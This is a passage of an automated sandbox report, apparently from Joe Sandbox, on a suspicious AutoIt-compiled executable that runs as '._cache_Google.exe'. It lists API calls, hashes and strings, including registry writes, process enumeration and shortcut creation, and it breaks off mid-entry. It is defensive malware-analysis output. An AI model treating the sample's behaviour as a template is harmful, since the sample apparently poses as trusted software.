                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1240663315-0
                                                                                                                                                                              • Opcode ID: b379394da0f9ca56356bfb455392eea82a3163d9382268a8cec2d7565f5adfb5
                                                                                                                                                                              • Instruction ID: a21cc54dc9580a6236b317e3c15ecaa88f03c3daf5b86fe4e4bed89c41f79a21
                                                                                                                                                                              • Opcode Fuzzy Hash: b379394da0f9ca56356bfb455392eea82a3163d9382268a8cec2d7565f5adfb5
                                                                                                                                                                              • Instruction Fuzzy Hash: 82E16B35204200AFDB14DF25C894E6ABBF9FF88724B04896EF44ADB261DB35ED45CB51
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 004CE4A7
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0054DC28,?,?), ref: 004CE567
                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5BC
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5C7
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5DA
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5E4
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5F0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2717633055-0
                                                                                                                                                                              • Opcode ID: 22a48b780ef9e5a9c53e33add2607d459a744fd66510ecdda24da9d2a1f261b9
                                                                                                                                                                              • Instruction ID: d77789f1447a35d79beb2211e69d2310d5f00f4eefd23fd8c65d3bffe5b1823f
                                                                                                                                                                              • Opcode Fuzzy Hash: 22a48b780ef9e5a9c53e33add2607d459a744fd66510ecdda24da9d2a1f261b9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0261F1B5809290EBCF15CFA998C06E97FB46F2A304F1845DED8449B347D728C949CB2A
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004B3202
                                                                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 004B3219
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 005257D7
                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 005257EC
                                                                                                                                                                              • LockResource.KERNEL32(?), ref: 005257FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                              • String ID: SCRIPT
                                                                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                                                                              • Opcode ID: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                                                                                                                                              • Instruction ID: 85ba8ee9e22b84a81c83e00aca906ea829c43fa5b11b258444ac988d1c55c40e
                                                                                                                                                                              • Opcode Fuzzy Hash: 8edc5bf659cdb52c309c11891bbf1b62fb862dcf97067f77a34ddffcc33a968f
                                                                                                                                                                              • Instruction Fuzzy Hash: 84117974200701BFEB258F66FC4AF677BB9EBC9B42F208469F40296290DB71DD049A70
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 004F6FAC
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004F6FD0
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6FE3
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1605983538-0
                                                                                                                                                                              • Opcode ID: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                                                                                                                                              • Instruction ID: 15368c93121fd84bacccbb3a9f4fb28405a045fda4044a57a1857885731b4f74
                                                                                                                                                                              • Opcode Fuzzy Hash: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                                                                                                                                              • Instruction Fuzzy Hash: 352156B1904219AFDB10ABA0DC88BEEB7BDAF54304F1004DAF605D3241EB799F84DB65
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 004F78CB
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004FF04D
                                                                                                                                                                              • CoCreateInstance.OLE32(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FF066
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004FF083
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 2126378814-24824748
                                                                                                                                                                              • Opcode ID: 5227451e82deb2945366ba669d58bf8b893a1f8bcc33c1d4ce01c4d2cf9c8ad2
                                                                                                                                                                              • Instruction ID: d7906453ae6fc5d8a4ddc94110f875b29a8897423b6e1ba3ff770d51f6800902
                                                                                                                                                                              • Opcode Fuzzy Hash: 5227451e82deb2945366ba669d58bf8b893a1f8bcc33c1d4ce01c4d2cf9c8ad2
                                                                                                                                                                              • Instruction Fuzzy Hash: 1EA144356042059FC700DF14C984E6ABBE9BF88324F04899EF9969B3A1DB35EC09CB95
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(004BC848,004BC848), ref: 004CDDA2
                                                                                                                                                                              • FindFirstFileW.KERNEL32(004BC848,?), ref: 00524A83
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesFindFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4185537391-0
                                                                                                                                                                              • Opcode ID: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                                                                                                                                              • Instruction ID: bff4dc4306f6731882c783e2631efd6a385da51ec33d4cc740d4dc8f3d4b0b1f
                                                                                                                                                                              • Opcode Fuzzy Hash: 88540729e130c2ecdafd96c84282637996675b281a96911e1adbdcb16e64a2fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CE0D8318144116742146738FC4D8EE7B7D9E06338B10071AF836C21E0E7749D55D9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 02941d5a75eb19c0ae0079a20b70dc8702a683012dfc1a4fcbb333efb5332d1b
                                                                                                                                                                              • Instruction ID: fc3c2c15fe6cf54e4426d22c26510a0e846df279cb9caf151d35a971045180a9
                                                                                                                                                                              • Opcode Fuzzy Hash: 02941d5a75eb19c0ae0079a20b70dc8702a683012dfc1a4fcbb333efb5332d1b
                                                                                                                                                                              • Instruction Fuzzy Hash: A322AC70E052158FDB14DF58C490BFAB7F0FF59304F1480AAE8469B391E779A885CBA9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3964851224-0
                                                                                                                                                                              • Opcode ID: ddee1e21e802b71431c40afac543b2aff1e0342526b75a1924011c5ad87417d2
                                                                                                                                                                              • Instruction ID: 703aeabff22674577a4587a35b7399fb203890259f54c81e2e915c8c5aff9a29
                                                                                                                                                                              • Opcode Fuzzy Hash: ddee1e21e802b71431c40afac543b2aff1e0342526b75a1924011c5ad87417d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 13929C746083018FD764DF19C490F6ABBE0BF89308F14885EE98A8B392D779ED45CB56
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                              • Opcode ID: 64fc8a659e437cab47a783772610c07d147e84a1c7a22512ccfa2844ed9c239b
                                                                                                                                                                              • Instruction ID: 37d858c9a643de2cf0ea8e15aff1ea8b884f43ef1af89474732bd0039ac344bd
                                                                                                                                                                              • Opcode Fuzzy Hash: 64fc8a659e437cab47a783772610c07d147e84a1c7a22512ccfa2844ed9c239b
                                                                                                                                                                              • Instruction Fuzzy Hash: 46C04CB140401DDFD715CB80D9499EFB7BCBB14300F104495A115E1140D7709B459B71
                                                                                                                                                                              APIs
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE279
                                                                                                                                                                              • timeGetTime.WINMM ref: 004BE51A
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 004BE646
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 004BE651
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE664
                                                                                                                                                                              • LockWindowUpdate.USER32(00000000), ref: 004BE697
                                                                                                                                                                              • DestroyWindow.USER32 ref: 004BE6A3
                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004BE6BD
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00525B15
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 005262AF
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 005262BD
                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005262D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                              • API String ID: 2641332412-570651680
                                                                                                                                                                              • Opcode ID: 1a82436a7fae32e55f0d9cfa7180547253cc792bee01f73fc5a6f6b21dcce545
                                                                                                                                                                              • Instruction ID: 317cae6480f19941134a8b6f02341eabd4f0fa9d860d4c34ffab7ac9e1c5ddfb
                                                                                                                                                                              • Opcode Fuzzy Hash: 1a82436a7fae32e55f0d9cfa7180547253cc792bee01f73fc5a6f6b21dcce545
                                                                                                                                                                              • Instruction Fuzzy Hash: E3621170504340DFDB24DF25D885BEA7BE4BF85308F04496EF94A8B292DB78D848DB66
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___createFile.LIBCMT ref: 004E6C73
                                                                                                                                                                              • ___createFile.LIBCMT ref: 004E6CB4
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6CDD
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004E6CE4
                                                                                                                                                                              • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6CF7
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6D1A
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004E6D23
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6D2C
                                                                                                                                                                              • __set_osfhnd.LIBCMT ref: 004E6D5C
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6DC6
                                                                                                                                                                              • __close_nolock.LIBCMT ref: 004E6DEC
                                                                                                                                                                              • __chsize_nolock.LIBCMT ref: 004E6E1C
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6E2E
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6F26
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6F3B
                                                                                                                                                                              • __close_nolock.LIBCMT ref: 004E6F9B
                                                                                                                                                                                • Part of subcall function 004DF84C: CloseHandle.KERNEL32(00000000,0055EEC4,00000000,?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF89C
                                                                                                                                                                                • Part of subcall function 004DF84C: GetLastError.KERNEL32(?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF8A6
                                                                                                                                                                                • Part of subcall function 004DF84C: __free_osfhnd.LIBCMT ref: 004DF8B3
                                                                                                                                                                                • Part of subcall function 004DF84C: __dosmaperr.LIBCMT ref: 004DF8D5
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6FBD
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E70F2
                                                                                                                                                                              • ___createFile.LIBCMT ref: 004E7111
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004E711E
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004E7125
                                                                                                                                                                              • __free_osfhnd.LIBCMT ref: 004E7145
                                                                                                                                                                              • __invoke_watson.LIBCMT ref: 004E7173
                                                                                                                                                                              • __wsopen_helper.LIBCMT ref: 004E718D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                              • String ID: 9AM$@
                                                                                                                                                                              • API String ID: 3896587723-3066932247
                                                                                                                                                                              • Opcode ID: fe0bc26f134c7fec5e4b9162a812793511b50cbc40663f6fa49a1f53d35db8f7
                                                                                                                                                                              • Instruction ID: fb0d25ed0290265abbe0b3dcbdf6d7870792e50cfe61dd5b9051275790d96148
                                                                                                                                                                              • Opcode Fuzzy Hash: fe0bc26f134c7fec5e4b9162a812793511b50cbc40663f6fa49a1f53d35db8f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 06225231D002859FEB249E6ADC91BBF7B60EB203A5F25422BE521AB3D1C73D8D40D759

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 004F76ED
                                                                                                                                                                              • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 004F7713
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F7741
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004F774C
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F7762
                                                                                                                                                                              • _wcsstr.LIBCMT ref: 004F776D
                                                                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004F7789
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F77D2
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F77D9
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 004F7804
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                              • API String ID: 699586101-1459072770
                                                                                                                                                                              • Opcode ID: b8ee5d85debfd2ab246a765d05a0e9f4bd68c1538f965641dcc3455fc4de4998
                                                                                                                                                                              • Instruction ID: a2ab51df16d3e03b6744706ef45819f623d03e974bcb0b0292c5c7290f302ba0
                                                                                                                                                                              • Opcode Fuzzy Hash: b8ee5d85debfd2ab246a765d05a0e9f4bd68c1538f965641dcc3455fc4de4998
                                                                                                                                                                              • Instruction Fuzzy Hash: 35411771904204BAD701B7659C97EBF7BFCEF55754F00005BF900A3292EB6CAA01D6B9

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004B1FBE
                                                                                                                                                                              • IsWindow.USER32(?), ref: 0052282E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Foreground_memmove
                                                                                                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                              • API String ID: 3828923867-1919597938
                                                                                                                                                                              • Opcode ID: 4022d7bb4eedcec83aba75656e7aa9e4b7797e604107f27938491b63c56d8ab1
                                                                                                                                                                              • Instruction ID: 269ebd1c1fae1ef50743c9bd3f7328f184a7ba1db6185a31f3e572afaf27b7f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 4022d7bb4eedcec83aba75656e7aa9e4b7797e604107f27938491b63c56d8ab1
                                                                                                                                                                              • Instruction Fuzzy Hash: A5D10534104702EBCB04EF21D491AAABFB1FF55348F444A2EF456571E1CB34E95ACBA2

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00513626
                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,0054DBF0,00000000,?,00000000,?,?), ref: 00513694
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005136DC
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00513765
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00513A85
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00513A92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                              • API String ID: 536824911-966354055
                                                                                                                                                                              • Opcode ID: ccd96c98d5f6e0755f3f7eea420576bb053a60f3e24155ef8148ab38194197fd
                                                                                                                                                                              • Instruction ID: 3d6435405a48c12322428853e86fc6e7ec22dfb2df5004df2cad53beb3a0abca
                                                                                                                                                                              • Opcode Fuzzy Hash: ccd96c98d5f6e0755f3f7eea420576bb053a60f3e24155ef8148ab38194197fd
                                                                                                                                                                              • Instruction Fuzzy Hash: C2029C75200601AFDB04EF25C891E6ABBE5FF88724F04845EF88A9B361EB34ED41CB55

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004B43C0
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0052214E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\._cache_Google.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                              • API String ID: 861526374-509745777
                                                                                                                                                                              • Opcode ID: babb5f09155c59c772fb0ea21307a9163f0cf18d7f4b620b2b508f102c59d248
                                                                                                                                                                              • Instruction ID: 47bb017c9f432d4337db13d9659dad45d83ed8d4409e47c35f9c402ef419a79b
